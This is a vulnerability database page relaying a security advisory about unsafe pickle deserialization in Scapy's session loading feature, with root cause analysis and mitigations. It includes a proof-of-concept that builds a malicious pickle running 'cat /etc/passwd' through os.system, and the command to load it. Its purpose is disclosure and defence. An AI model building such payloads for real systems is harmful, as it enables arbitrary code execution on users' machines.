N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-cq46-m9x9-j8w2

EPSS Score

CWE

CWE-502

Published

10/22/2025

Updated

10/22/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-cq46-m9x9-j8w2

GHSA-cq46-m9x9-j8w2: Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.

Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py
SESSION = pickle.load(gzip.open(session_name, "rb"))

Since no validation or restriction is performed on the deserialized object, any code embedded via __reduce__() will be executed immediately. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try:
    s = pickle.load(gzip.open(fname, "rb"))
except IOError:
    try:
        s = pickle.load(open(fname, "rb"))

PoC

Create a malicious payload:

import pickle, os, gzip

class RCE:
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd",))

payload = gzip.compress(pickle.dumps(RCE()))

with open("evil.pkl.gz", "wb") as f:
    f.write(payload)

Then run Scapy with:

./run_scapy -s ./evil.pkl.gz

Result: cat /etc/passwd executes immediately, before shell is shown.

Impact

This is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

Vulnerability type: Insecure deserialization (Python pickle)
CWE: CWE-502: Deserialization of Untrusted Data
CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS Score: 5.4 (Medium)
Impact: Arbitrary Code Execution
Attack vector: Local or supply chain (malicious .pkl.gz)
Affected users: Any user who loads session files (even interactively)
Affected version: Scapy v2.6.1

Mitigations

Do not use 'sessions' (the -s option when launching Scapy).
Use the Scapy 2.7.0+ where the session mechanism has been removed.

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-cq46-m9x9-j8w2

EPSS Score

CWE

CWE-502

Published

10/22/2025

Updated

10/22/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
scapy	pip	<= 2.6.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability lies in the insecure deserialization of session files using Python's pickle module. The advisory points out that Scapy allows users to load session files via the -s command-line option, which triggers the deserialization of a user-controlled file.

The analysis of the provided patch commit 13621d1145b3435e9d03caf20997107a84435c0b confirms this. The patch entirely removes the session management feature, including the functions responsible for loading, saving, and updating sessions.

The key vulnerable functions identified are:

load_session: This function was the primary entry point for loading a session from a file. It directly used pickle.load() on the file path provided, which is the root cause of the vulnerability.
init_session: This function was called on startup to initialize the Scapy session. It contained logic to load an existing session from a file using pickle.load(), making it another vector for the same vulnerability.
update_session: This function was used to update an existing session from a file, and it also used pickle.load(), making it vulnerable.

During exploitation, an attacker would craft a malicious .pkl.gz file containing a pickled object with a __reduce__ method that executes arbitrary commands. When a user loads this file in Scapy, the load_session or init_session function would be called, triggering the pickle.load() call and executing the malicious code. The profiler would show one of these functions in the stack trace at the time of exploitation. The mitigation was to completely remove this functionality, as seen in the commit, eliminating the vulnerable functions.

Vulnerable functions

load_session

scapy/main.py

The function `load_session` is vulnerable to arbitrary code execution because it uses `pickle.load()` to deserialize a user-provided session file. An attacker can craft a malicious pickle file that, when loaded, executes arbitrary code. The patch completely removes this function.

init_session

scapy/main.py

The `init_session` function was vulnerable as it loaded and deserialized a session file specified via the `session_name` argument, which could be controlled from the command line. It used `pickle.load()` without any safety checks, allowing for arbitrary code execution. The patch removes this session-loading logic from the function.

update_session

scapy/main.py

Similar to `load_session`, the `update_session` function was vulnerable because it deserialized a file using `pickle.load()` to update the current session. This could be exploited for arbitrary code execution if a malicious file was provided. The patch completely removes this function.

WAF Protection Rules

WAF Rule

### Summ*ry *n uns*** **s*ri*liz*tion vuln*r**ility in S**py <v*.*.* *llows *tt**k*rs to *x**ut* *r*itr*ry *o** **w**n * m*li*ious s*ssion *il* is lo**lly lo**** vi* t** `-s` option**. T*is r*quir*s *onvin*in* * us*r to m*nu*lly lo** * m*li*ious s*s

Reasoning

T** vuln*r**ility li*s in t** ins**ur* **s*ri*liz*tion o* s*ssion *il*s usin* Pyt*on's `pi*kl*` mo*ul*. T** **visory points out t**t S**py *llows us*rs to lo** s*ssion *il*s vi* t** `-s` *omm*n*-lin* option, w*i** tri***rs t** **s*ri*liz*tion o* * us

N/A

Basic Information

Concerned about an active attack path?

GHSA-cq46-m9x9-j8w2: Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization

Summary

Details

PoC

Impact

Mitigations

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI